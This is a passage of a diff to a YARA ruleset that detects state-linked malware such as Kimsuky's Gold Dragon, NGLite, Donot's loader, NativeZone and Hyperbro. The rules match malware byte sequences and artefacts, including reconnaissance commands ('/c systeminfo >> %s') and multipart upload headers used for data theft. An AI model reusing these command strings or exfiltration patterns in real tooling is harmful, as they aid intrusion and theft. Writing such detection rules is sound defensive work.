-		$s1 = { 25 50 44 46 2d 31 2e 33 0a 25 06 8b c4 1c c5 86 66 f3 dc 75 f9 3b dd 8c 44 e3 d3 a4 74 9d 94 4e 2e 0f d9 01 a6 f2 88 6a a8 0b 16 1b 1a fc 60 3f 72 7a 1b c1 a7 bb 2f 19 31 6d 6f 79 db 20 f6 c7 fa e7 eb b9 88 77 de 1f a1 92 d7 ea 68 a9 b7 89 17 92 e8 b2 bb a5 58 56 b4 30 60 f8 28 0c 54 7b 2b 68 ba 7e 01 01 6d ad 2e 6d 72 67 1e b0 a8 ea 42 82 bd 14 9a 86 f0 0d 9a 8b 92 76 b3 b3 7d ef 69 24 2c 9f c2 ca e9 c9 b3 }
-		$s2 = { 25 25 45 4f 46 0a }
+		$seq1 = { 55 48 89 e5 48 83 c4 80 bf 04 20 00 00 e8 69 d5 ff ff 48 89 45 f8 ?? 8b 05 [2] 31 00 [0-4] 48 8b 3d [2] 31 00 48 8b 35 [2] 31 00 48 8b 0d [2] 31 00 4c 8b 0d [2] 31 00 4c 8b [2] 13 31 00 48 8b 15 ?? 13 31 00 48 8b 45 f8 4c 89 ?? 24 18 48 89 7c 24 10 48 89 74 24 08 48 89 0c 24 ?? 89 }
+		$seq2 = { 48 89 e5 bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff 8b 05 [2] 20 00 89 c6 bf [2] 41 00 b8 00 00 00 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff }
+		$seq3 = { 48 83 ec 20 c7 45 fc 00 00 00 00 eb 64 8b 45 fc 48 8b 14 c5 48 92 61 00 48 8b 05 ?? bd 20 00 48 89 c6 bf 40 93 61 00 b8 00 00 00 00 e8 ?? 3f ff ff 8b 45 fc 48 8b 04 c5 48 92 61 00 48 89 c6 bf [2] 41 00 b8 00 00 00 00 e8 ?? 3d ff ff be [2] 41 00 bf 40 93 61 00 e8 ?? 3e ff ff 48 89 45 f0 48 8b 45 f0 48 89 c7 e8 ?? 3d ff ff 83 45 fc 01 83 7d fc 00 74 96 48 8b 05 [2] 20 00 48 89 c7 e8 ?? 3c ff ff 48 8b 05 [2] 20 00 be [2] 41 00 48 89 c7 e8 ?? 3e ff ff 48 89 45 e8 48 8b 45 e8 48 89 c7 e8 ?? 3d ff ff c9 c3 55 48 89 e5 48 83 ec 20 48 89 7d e8 48 8b 45 e8 48 89 c7 e8 ?? 3c ff ff 89 c2 8b 05 ?? d0 30 00 01 d0 83 c0 01 89 c7 e8 ?? 91 ff ff 48 89 45 f8 48 8b 55 e8 48 8b 45 f8 48 89 d6 48 89 c7 e8 ?? 3c ff ff 48 8b 45 f8 48 c7 c1 ff ff ff ff 48 89 c2 b8 00 00 00 00 48 89 d7 f2 ae 48 89 c8 48 f7 d0 48 8d 50 ff 48 8b 45 f8 48 01 d0 66 c7 00 2f 00 48 8b 15 ?? cf 30 00 48 8b 45 f8 48 89 d6 48 89 c7 e8 ?? 3e ff ff 48 8b 45 f8 be [2] 41 00 48 89 c7 e8 ?? 3e ff ff 48 89 45 f0 48 83 7d f0 00 }
+		$seq4 = { 48 89 e5 48 83 ec 10 c7 45 fc 58 00 00 00 8b 45 fc 48 8d 55 f0 48 89 c6 bf 00 a5 71 00 e8 [2] 00 00 48 89 05 ?? 0b 31 00 48 8d 45 f0 48 89 c2 be 20 00 00 00 bf c0 a4 71 00 e8 [2] 00 00 48 89 05 [2] 31 00 b8 00 00 00 00 e8 b7 fd ff ff 48 89 05 [2] 31 00 48 8b 05 [2] 31 00 48 85 c0 74 09 48 8b 05 [2] 31 00 eb 05 b8 [2] 41 00 48 89 05 [2] 31 00 b8 00 00 00 00 e8 80 fe ff ff 48 89 05 [2] 31 00 48 8b 05 [2] 31 00 48 85 c0 74 09 48 8b 05 [2] 31 00 eb 05 b8 [2] 41 00 48 89 05 ?? 0a 31 00 48 c7 05 ?? 0a 31 00 [2] 41 00 e8 ?? f6 ff ff e8 f1 f7 ff ff b8 01 00 00 00 }
 
 	condition:
-		filesize > 50KB and all of ( $s* )
+		uint32( 0 ) == 0x464c457f and filesize > 50KB and 3 of ( $seq* )
 }
-rule ARKBIRD_SOLG_MAL_Nativezone_May_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_MAL_NK_Rivts_Feb_2009_1 : FILE
 {
 	meta:
-		description = "Detect NativeZone malware"
+		description = "Detect Rivts malware used by NK APT"
 		author = "Arkbird_SOLG"
-		id = "5b858a8d-6e6a-5712-a83a-229bed1c7872"
-		date = "2021-05-28"
-		modified = "2021-06-05"
+		id = "71dacbd4-36bb-5a45-a288-31bfaef784dc"
+		date = "2020-06-17"
+		modified = "2020-06-18"
+		reference = "https://twitter.com/Arkbird_SOLG/status/1272674621381361672"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-07/NK_Rivts_Feb_2009_1.yar#L3-L22"
+		license_url = "N/A"
+		logic_hash = "aab3e8067933cbaef2725b5db9e744df2e2be0a89aaf7ce85df79c5f45d72d8f"
+		score = 75
+		quality = 67
+		tags = "FILE"
+		hash1 = "244885b47ec2157a8ea9278bec3ea1883f45d97b1fcb78d4fa875bef0f329a97"
+
+	strings:
+		$s1 = "F:\\meWork\\ksj\\Test\\testVir-ga\\testvir_non\\Debug\\testvir_non.pdb" fullword ascii
+		$s2 = "\\\\.\\pipe\\TESTVIR1PIPE" fullword ascii
+		$s3 = "\\system32\\Hana80.exe" fullword ascii
+		$s4 = "\\system32\\nnr60.exe" fullword ascii
+		$s5 = { 54 45 53 54 56 49 52 31 5f 45 56 45 4e 54 5f 4f 42 4a }
+		$s6 = "INFECT" fullword ascii
+		$s7 = { 54 45 53 54 5f 5f 5f 41 43 43 45 53 53 5f 44 49 52 }
+		$s8 = { 2e 70 69 66 }
+		$s9 = { 2f 2f 2f 2f 44 41 45 4d 4f 4e }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 7 of them
+}
+rule ARKBIRD_SOLG_APT_Kimsuky_Aug_2020_1 : FILE
+{
+	meta:
+		description = "Detect Gold Dragon used by Kimsuky APT group"
+		author = "Arkbird_SOLG"
+		id = "dd79aa3b-0bbc-5fdd-808e-c2dee6d89804"
+		date = "2020-08-31"
+		modified = "2020-09-14"
 		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-01/NOBELIUM/MAL_NativeZone_May_2021_1.yara#L1-L17"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-09-14/Kimsuky/APT_Kimsuky_Aug_2020_1.yar#L1-L23"
 		license_url = "N/A"
-		logic_hash = "9281784100e922fe3ef64e7c112276ffa5f8691ab4f24f1b68fbb0495e449bd3"
+		logic_hash = "4644ea81535c867a36a882bb270cea784ae135e7acc7078823be0579b1746932"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "136f4083b67bc8dc999eb15bb83042aeb01791fc0b20b5683af6b4ddcf0bbc7d"
-		hash2 = "3b94cc71c325f9068105b9e7d5c9667b1de2bde85b7abc5b29ff649fd54715c4"
-		tlp = "White"
-		adversary = "NOBELIUM"
+		hash1 = "4ff2a67b094bcc56df1aec016191465be4e7de348360fd307d1929dc9cbab39f"
+		hash2 = "97935fb0b5545a44e136ee07df38e9ad4f151c81f5753de4b59a92265ac14448"
 
 	strings:
-		$s1 = { 8b ff 55 8b ec 81 ec 1c 01 00 00 a1 00 ?? 01 10 33 c5 89 45 fc 8b 4d 0c 53 8b 5d 14 56 8b 75 08 89 b5 fc fe ff ff 89 9d f8 fe ff ff 57 8b 7d 10 89 bd 00 ff ff ff 85 f6 75 25 85 c9 74 21 e8 [2] ff ff c7 00 16 00 00 00 e8 [2] ff ff 8b 4d fc 5f 5e 33 cd 5b e8 [2] ff ff 8b e5 5d c3 85 ff 74 db 85 db 74 d7 c7 85 f4 fe ff ff 00 00 00 00 83 f9 02 72 d8 49 0f af cf 03 ce 89 8d 04 ff ff ff 8b c1 33 d2 2b c6 f7 f7 8d 78 01 83 ff 08 0f 87 dc 00 00 00 8b bd 00 ff ff ff 3b ce 0f 86 a1 00 00 00 8d 14 37 89 95 ec fe ff ff 8d 49 00 8b c6 8b f2 89 85 08 ff ff ff 3b f1 77 31 8b ff 50 56 8b cb ff 15 [2] ?? 10 ff d3 83 c4 08 85 c0 7e 0a 8b c6 89 85 08 ff ff ff eb 06 8b 85 08 ff ff ff 8b 8d 04 ff ff ff 03 f7 3b f1 76 d1 8b d1 3b c1 74 34 2b c1 8b df 89 85 08 ff ff ff 90 8a 0c 10 8d 52 01 8b b5 08 ff ff ff 8a 42 ff 88 44 16 ff 8b c6 88 4a ff 83 eb 01 75 e3 8b 9d f8 fe ff ff 8b 8d 04 ff ff ff 8b b5 fc fe ff ff 2b cf 8b 95 ec fe ff ff 89 8d 04 ff ff ff 3b }
-		$s2 = { 8b b5 00 ff ff ff 8b cb 8b 85 fc fe ff ff d1 ef 0f af fe 03 f8 57 50 ff 15 [3] 10 ff d3 83 c4 08 85 c0 7e 10 56 57 ff b5 fc fe ff ff e8 1b fe ff ff 83 c4 0c ff b5 04 ff ff ff 8b cb ff b5 fc fe ff ff ff 15 [3] 10 ff d3 83 c4 08 85 c0 7e 15 56 ff b5 04 ff ff ff ff b5 fc fe ff ff e8 e9 fd ff ff 83 c4 0c ff b5 04 ff ff ff 8b cb 57 ff 15 [3] 10 ff d3 83 c4 08 85 c0 7e 10 56 ff b5 04 ff ff ff 57 e8 c1 fd ff ff 83 c4 0c 8b 85 04 ff ff ff 8b d8 8b b5 fc fe ff ff 8b 95 00 ff ff ff 89 85 08 ff ff ff 8d 64 24 00 3b fe 76 37 03 f2 89 b5 f0 fe ff ff 3b f7 73 25 8b 8d f8 fe ff ff 57 56 ff 15 [3] 10 ff 95 f8 fe ff ff 8b 95 00 ff ff ff 83 c4 08 85 c0 7e d3 3b fe 77 3d 8b 85 04 ff ff ff 8b 9d f8 fe ff ff 03 f2 3b f0 77 1f 57 56 8b cb ff 15 [3] 10 ff d3 8b 95 00 ff ff ff 83 c4 08 85 c0 8b 85 04 ff ff ff 7e db 8b 9d 08 ff ff ff 89 b5 f0 fe ff ff 8b b5 f8 fe ff ff eb 06 8d 9b 00 00 00 00 8b 95 00 ff ff ff 8b c3 2b da 89 85 08 ff ff ff 3b df 76 1f 57 53 8b ce ff 15 [3] 10 ff d6 83 c4 08 85 c0 7f d9 8b 95 00 ff ff ff 8b 85 08 ff ff ff 8b b5 f0 fe ff ff 89 9d 08 ff ff ff }
-		$s3 = { 8b 45 f4 89 7d f8 8d 04 86 8b c8 89 45 e8 8b c7 89 4d f4 3b 45 dc 74 5b 8b d6 2b d7 89 55 e4 8b 00 8b d0 89 45 ec 8d 42 01 89 45 f0 8a 02 42 84 c0 75 f9 2b 55 f0 8d 42 01 50 ff 75 ec 89 45 f0 8b 45 e8 2b c1 03 45 fc 50 51 e8 [2] 00 00 83 c4 10 85 c0 75 72 8b 45 f8 8b 55 e4 8b 4d f4 89 0c 02 83 c0 04 03 4d f0 89 4d f4 89 45 f8 3b 45 dc 75 ac 8b 45 0c 89 5d f8 89 30 8b f3 53 e8 [2] ff ff 59 8b 45 dc 8b d7 2b c2 89 55 e4 83 c0 03 c1 e8 02 39 55 dc 1b c9 f7 d1 23 c8 89 4d e8 74 18 8b f1 ff 37 e8 [2] ff ff 43 8d 7f 04 59 3b }
+		$s1 = "/c systeminfo >> %s" fullword ascii
+		$s2 = "/c dir %s\\ >> %s" fullword ascii
+		$s3 = ".?AVGen3@@" fullword ascii
+		$s4 = { 48 6f 73 74 3a 20 25 73 0d 0a 52 65 66 65 72 65 72 3a 20 68 74 74 70 3a 2f 2f 25 73 25 73 0d 0a 25 73 0d 0a 25 73 }
+		$s5 = "%s?filename=%s" fullword ascii
+		$s6 = "Content-Disposition: form-data; name=\"userfile\"; filename=\"" fullword ascii
+		$s7 = "Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywhpFxMBe19cSjFnG" fullword ascii
+		$s8 = "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"" fullword ascii
+		$s9 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; .NET CLR 1.1.4322)" fullword ascii
+		$s10 = "\\Microsoft\\HNC" fullword ascii
+		$s11 = "Mozilla/5.0" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 50KB and all of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 150KB and 8 of them
 }
-rule ARKBIRD_SOLG_MAL_Envyscout_May_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_MAL_Donot_Loader_June_2020_1 : FILE
 {
 	meta:
-		description = "Detect EnvyScout downloader"
+		description = "Detect loader malware used by APT Donot for drops the final stage"
 		author = "Arkbird_SOLG"
-		id = "645f60d1-7c95-515c-a88e-d8528cf8b644"
-		date = "2021-05-28"
-		modified = "2021-06-02"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-01/NOBELIUM/MAL_EnvyScout_May_2021_1.yara#L1-L20"
+		id = "ec4cac12-529f-56d2-bbc0-5fe30424b10b"
+		date = "2020-06-22"
+		modified = "2020-06-22"
+		reference = "https://twitter.com/ccxsaber/status/1274978583463649281"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-22/APT_MAL_Donot_Loader_June_2020_1.yar#L3-L22"
 		license_url = "N/A"
-		logic_hash = "7ce4fd18c88f7ea7486c51fc0b673d178bd26ecc2f4a39ec9c5a4a71aaa0daa1"
+		logic_hash = "986deffd48c1fb707948b00e1e200fa6538d4c73a32ab89f5119403f9bf0d734"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		hash1 = "279d5ef8f80aba530aaac8afd049fa171704fc703d9cfe337b56639732e8ce11"
-		hash2 = "9059c5b46dce8595fcc46e63e4ffbceeed883b7b1c9a2313f7208a7f26a0c186"
-		tlp = "White"
-		adversary = "NOBELIUM"
+		hash1 = "1ff33d1c630db0a0b8b27423f32d15cc9ef867349ac71840aed47c90c526bb6b"
 
 	strings:
-		$s1 = "==typeof window&&window.window===window?window:" fullword ascii
-		$s2 = "==typeof self&&self.self===self?self:" fullword ascii
-		$s3 = "0===t?t={autoBom:!1}:" fullword ascii
-		$s4 = "_global.saveAs=saveAs.saveAs=saveAs" fullword ascii
-		$s5 = "navigator.userAgent" fullword ascii
-		$s6 = { 6e 65 77 20 42 6c 6f 62 28 5b [1-12] 5d 2c 20 7b 74 79 70 65 3a 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 22 7d 29 3b 73 61 76 65 41 73 28 }
+		$s1 = "C:\\Users\\spartan\\Documents\\Visual Studio 2010\\new projects\\frontend\\Release\\test.pdb" fullword ascii
+		$s2 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Edg/81.0.416.68" fullword ascii
+		$s3 = "bbLorkybbYngxkjbb]khbbmgvjgz4k~k" fullword ascii
+		$s4 = "8&8-8X8.959?9Q9h9v9|9" fullword ascii
+		$s5 = "0$0h4h5l5p5t5x5|5" fullword ascii
+		$s6 = "?&?+?1?7?M?T?g?z?" fullword ascii
+		$s7 = "12.02.1245" fullword ascii
+		$s8 = ">>?C?L?[?~?" fullword ascii
+		$s9 = "6*6=6P6b6" fullword ascii
 
 	condition:
-		filesize > 100KB and 5 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 30KB and 7 of them
 }
-rule ARKBIRD_SOLG_APT_Tardigrade_Nov_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Nglite_Nov_2021_2 : FILE
 {
 	meta:
-		description = "Detect Tardigrade loader"
+		description = "Detect NGLite backdoor (version B)"
 		author = "Arkbird_SOLG"
-		id = "f6c8014a-21dd-5ebd-9edd-7a9f649a43a0"
-		date = "2021-11-22"
-		modified = "2021-11-23"
-		reference = "https://www.isac.bio/post/tardigrade"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-22/APT_Tardigrade_Nov_2021_1.yara#L1-L19"
+		id = "e18f2891-366b-5cff-a17e-63523bfd9cee"
+		date = "2021-11-08"
+		modified = "2021-11-09"
+		reference = "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-08/NGLite/MAL_NGLite_Nov_2021_2.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "98358d9dbf62e653b136268d8694ed4d7f48c80125dd12ccea5f36ff5c6b4a3c"
+		logic_hash = "4d44d208010ca17f47f597f7d9eb5ee39d91a2d9077218a173ef0015699dc296"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "1c7c1a28921d81f672320e81ad58642ef3b8e27abf8a8e51400b98b40f49568be"
-		hash2 = "c0976a1fbc3dd938f1d2996a888d0b3a516b432a2c38d788831553d81e2f5858"
-		hash3 = "cf88926b7d5a5ebbd563d0241aaf83718b77cec56da66bdf234295cc5a91c5fe"
+		hash1 = "3f868ac52916ebb6f6186ac20b20903f63bc8e9c460e2418f2b032a207d8f21d"
+		hash2 = "805b92787ca7833eef5e61e2df1310e4b6544955e812e60b5f834f904623fd9f"
 		tlp = "white"
-		adversary = "Tardigrade"
+		adversary = "-"
 
 	strings:
-		$s1 = { 63 6d 64 2e 65 78 65 20 2f 63 20 65 63 68 6f 20 [10-40] 3e 22 25 73 22 26 65 78 69 74 }
-		$s2 = { 4c 89 44 24 38 89 54 24 34 48 89 4c 24 28 e8 [2] 01 00 e8 [2] 01 00 4c 8b 44 24 38 8b 54 24 34 48 8b 4c 24 28 48 83 c4 48 e9 71 fe ff ff 90 48 89 ca 48 8d 0d 76 ?? 02 00 }
-		$s3 = { 41 57 41 56 41 55 41 54 55 57 56 53 48 ?? ec [1-4] 48 8b 84 24 ?? 00 00 00 48 89 44 24 60 48 8b 05 [2] 01 00 48 89 4c 24 40 ?? 38 }
-		$s4 = { 45 31 c0 48 8d 8c 24 ?? 02 00 00 4c 8d 8c 24 ?? 01 00 00 48 8d 15 [2] 01 00 ff 15 [2] 02 00 }
+		$s1 = { 8b 05 64 ?? bf 00 8d 0d e0 ?? c6 00 89 04 24 89 4c 24 04 c7 44 24 08 08 02 00 00 e8 d0 1d 00 00 8b 44 24 0c 85 c0 74 2e 3d 08 02 00 00 77 27 8d 1d e0 ?? c6 00 c6 04 03 5c 40 89 05 24 ?? c6 00 e9 0b ff ff ff 31 c0 e8 44 9f 02 00 ba 09 02 00 00 e8 6a 9f 02 00 8d 05 ?? 7b 8a 00 89 04 24 c7 44 24 04 24 00 00 00 e8 a4 3b 00 00 31 c0 e8 1d 9f 02 00 90 e8 57 86 02 }
+		$s2 = { 83 ec 40 c7 44 24 18 00 00 00 00 c7 44 24 14 00 00 00 00 8b 05 70 ?? bf 00 89 04 24 c7 44 24 04 ff ff ff ff 8d 44 24 18 89 44 24 08 8d 44 24 14 89 44 24 0c e8 21 15 00 00 8b 44 24 10 85 c0 74 32 31 c0 31 c9 eb 03 40 89 d1 83 f8 20 7d 20 19 d2 89 cb 89 c1 bd 01 00 00 00 d3 e5 21 d5 23 6c 24 18 85 ed 74 05 8d 53 01 eb dc 89 da eb d8 85 c9 75 2d 8d 7c 24 1c 31 c0 e8 63 98 02 00 8b 0d 60 ?? bf 00 89 0c 24 8d 4c 24 1c 89 4c 24 04 e8 46 14 00 00 8b 4c 24 30 89 4c 24 44 83 c4 40 c3 89 4c 24 44 83 c4 40 c3 e8 4d 7d 02 00 e9 38 }
+		$s3 = { 0f b6 2c 13 95 80 f8 80 95 72 f0 c7 44 24 20 00 00 00 00 8b 0d 7c ?? bf 00 89 0c 24 89 44 24 04 8d 4c 24 20 89 4c 24 08 e8 77 0b 00 00 8b 44 24 0c 85 c0 75 4a c7 44 24 1c 00 00 00 00 8b 05 20 ?? bf 00 89 04 24 8b 44 24 24 89 44 24 04 8b 44 24 30 89 44 24 08 8b 44 24 34 89 44 24 0c 8d 44 24 1c 89 44 24 10 c7 44 24 14 00 00 00 00 e8 f1 0b 00 00 8b 44 24 1c 89 44 24 38 83 c4 28 c3 8b 44 24 24 89 04 24 8b 44 24 30 89 44 24 04 8b 44 24 34 89 44 24 08 e8 59 00 00 00 8b 44 24 }
+		$s4 = { 83 ec 50 c7 44 24 24 00 00 00 00 8b 05 88 ?? bf 00 89 04 24 c7 44 24 04 ff ff ff ff c7 44 24 08 fe ff ff ff c7 44 24 0c ff ff ff ff 8d 44 24 24 89 44 24 10 c7 44 24 14 00 00 00 00 c7 44 24 18 00 00 00 00 c7 44 24 1c 02 00 00 00 e8 09 04 00 00 64 8b 05 14 00 00 00 8b 80 00 00 00 00 8b 40 18 84 00 05 68 01 00 00 89 04 24 8b 44 24 24 89 44 24 04 e8 d2 86 fd ff 8d 7c 24 34 31 c0 e8 60 86 02 00 8b 05 30 ?? bf 00 89 04 24 8d 44 24 34 89 44 24 04 8d 44 24 34 89 44 24 08 c7 44 24 0c 1c 00 00 00 e8 b1 02 00 00 8b 44 24 }
+		$s5 = { 8b 05 94 ?? bf 00 89 04 24 c7 44 24 04 00 00 00 00 c7 44 24 08 00 00 00 00 c7 44 24 0c 00 00 00 00 c7 44 24 10 00 00 00 00 e8 ed 05 00 00 8b 44 24 14 8b 4c 24 1c 89 81 b4 01 00 00 85 c0 74 7e 8b 05 94 ?? bf 00 89 04 24 c7 44 24 04 00 00 00 00 c7 44 24 08 00 00 00 00 c7 44 24 0c 00 00 00 00 c7 44 24 10 00 00 00 00 e8 ad 05 00 00 8b 44 24 14 8b 4c 24 1c 89 81 b8 01 00 00 85 c0 74 04 83 c4 18 c3 8d 05 ?? ?? 8b 00 89 04 24 e8 c9 6c 02 00 8b 05 98 ?? bf 00 8b 4c 24 1c 8b 91 b4 01 00 00 89 04 24 89 54 24 04 e8 ad 04 00 00 8b 44 24 1c c7 80 b4 01 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 50KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize > 40KB and 4 of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_APT27_Hyperbro_Apr_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Nglite_Nov_2021_1 : FILE
 {
 	meta:
-		description = "Detect Hyperbro backdoor"
+		description = "Detect NGLite backdoor (version A)"
 		author = "Arkbird_SOLG"
-		id = "060a200e-17dd-5789-94d4-eeff5c2e9a18"
-		date = "2021-05-01"
-		modified = "2021-05-04"
-		reference = "-"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-03/APT27/APT_APT27_Hyperbro_Apr_2021_1.yara#L1-L21"
+		id = "cf2845f3-1176-5197-9d05-f123b0f23c75"
+		date = "2021-11-09"
+		modified = "2021-11-09"
+		reference = "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-08/NGLite/MAL_NGLite_Nov_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "1a32ab7c30885a665ede66640a9b047e3c381f6f535243fcadf1a7a22e76f407"
+		logic_hash = "ebafc52da76b9a960ee3c2c99955fb5dcb4acff2b7a0d7fad714bfc17617331a"
 		score = 75
-		quality = 35
+		quality = 75
 		tags = "FILE"
-		hash1 = "36fad80a5f328f487b20a3f5fc5f1902d50cbb1bd9167c44b66929a1288fc6f4"
-		hash2 = "52072a8f99dacd5c293fccd051eab95516d8b880cd2bc5a7e0f4a30d008e22a7"
-		hash3 = "9000ce3c0e01b6c80edb3af87aad8117513ce334135aa7d7b1c2afa067f4c4ab"
-		hash4 = "92bbcb5461ab5959e31f997a6df77995377d69f8077e43e5812fcbe9303d831c"
-		tlp = "White"
-		adversary = "APT27"
+		hash1 = "7e4038e18b5104683d2a33650d8c02a6a89badf30ca9174576bf0aff08c03e72"
+		hash2 = "3da8d1bfb8192f43cf5d9247035aa4445381d2d26bed981662e3db34824c71fd"
+		tlp = "white"
+		adversary = "-"
 
 	strings:
-		$seq1 = { 8b [5] 7? 0? [2] 0? ?? 0? [3] ff 75 0? [11] 5? [2] 0? ?? 8b }
-		$seq2 = { e8 ?? 0? 00 00 b0 01 c3 55 8b ec ff 75 08 ff 15 34 c0 00 10 85 c0 74 11 56 8b 30 50 e8 ?? 1? 00 00 8b c6 59 85 f6 75 f1 5e 5d c3 cc 8b 4c 24 0c 0f b6 44 24 08 8b d7 8b 7c 24 04 85 c9 0f 84 3c 01 00 00 69 c0 01 01 01 01 83 f9 20 0f 8e df 00 00 00 81 f9 80 00 00 00 0f 8c 8b 00 00 00 0f ba 25 b8 27 01 10 01 73 09 f3 aa 8b 44 24 04 8b fa c3 0f ba 25 10 20 01 10 01 0f 83 b2 00 00 00 66 0f 6e c0 66 }
-		$seq3 = { 8b 44 24 08 48 75 [13] be ?? 16 00 10 bb 00 10 00 10 05 [2] 00 00 2b f3 [0-3] 74 0? 8? [0-2] cf [0-4] 03 cb ?? 11 47 3b fe 72 ?? e8 ?? fd ff ff 5f 5e 5b 33 c0 40 c2 0c 00 8b ff 55 8b ec 8b 45 0c 56 57 83 f8 01 75 7c 50 e8 1c 14 00 00 59 85 c0 75 07 33 c0 e9 0e 01 00 00 e8 a6 06 00 00 85 c0 75 07 e8 32 14 00 00 eb e9 e8 af 13 00 00 ff 15 ?? 80 00 10 a3 18 b8 00 10 e8 68 12 00 00 a3 64 ac 00 10 e8 89 0c 00 00 85 c0 7d 07 e8 1f 03 00 00 eb cf e8 93 11 00 00 85 c0 7c 20 e8 12 0f 00 00 85 c0 7c 17 6a 00 e8 41 0a 00 00 59 85 c0 75 0b ff 05 60 ac 00 10 e9 a8 00 00 00 e8 a4 0e 00 00 eb c9 33 ff 3b c7 75 31 39 3d 60 ac 00 10 7e 81 ff 0d 60 ac 00 10 39 3d b4 ac 00 10 75 05 e8 d0 0b 00 00 39 7d 10 75 7b e8 77 0e 00 00 e8 bd 02 00 00 e8 a1 13 00 00 eb 6a 83 f8 02 75 59 e8 78 02 00 00 68 14 02 00 00 6a 01 e8 54 08 00 00 8b f0 59 59 3b f7 0f 84 36 ff ff ff 56 ff 35 00 a0 00 10 ff 35 7c ac 00 10 e8 d3 01 00 00 59 ff d0 85 c0 74 17 57 56 e8 b1 02 00 00 59 59 ff 15 ?? 80 00 10 83 4e 04 ff 89 06 eb 18 56 e8 3f 07 00 00 59 e9 fa fe ff ff 83 f8 03 75 07 57 e8 33 05 00 00 59 33 c0 40 5f 5e 5d c2 0c 00 6a 0c 68 d0 92 00 10 e8 ?? 15 00 00 8b f9 8b f2 8b 5d 08 33 c0 40 89 45 e4 85 f6 75 0c 39 15 60 ac 00 10 0f 84 c5 00 00 00 83 65 fc 00 3b f0 74 05 83 fe 02 75 2e a1 ?? 81 00 10 85 c0 74 08 57 56 53 ff d0 89 45 e4 83 7d e4 00 0f 84 96 00 00 00 57 56 53 e8 72 fe ff ff 89 45 e4 }
+		$s1 = { 48 8b 05 48 e7 90 00 48 8d 0d 99 4b 99 00 48 89 04 24 48 89 4c 24 08 48 c7 44 24 10 08 02 00 00 e8 82 21 00 00 48 8b 44 24 18 48 85 c0 74 33 48 3d 08 02 00 00 77 2b 48 8d 1d 69 4b 99 00 c6 04 03 5c 48 ff c0 48 89 05 4b 3f 99 00 e9 d6 fe ff ff 31 c0 e8 8f fc 02 00 ba 09 02 00 00 e8 b5 fc 02 00 48 8d 05 fe d5 55 00 48 89 04 24 48 c7 44 24 08 24 00 00 00 e8 cc 44 00 00 31 c0 e8 65 fc 02 00 90 e8 af d2 02 }
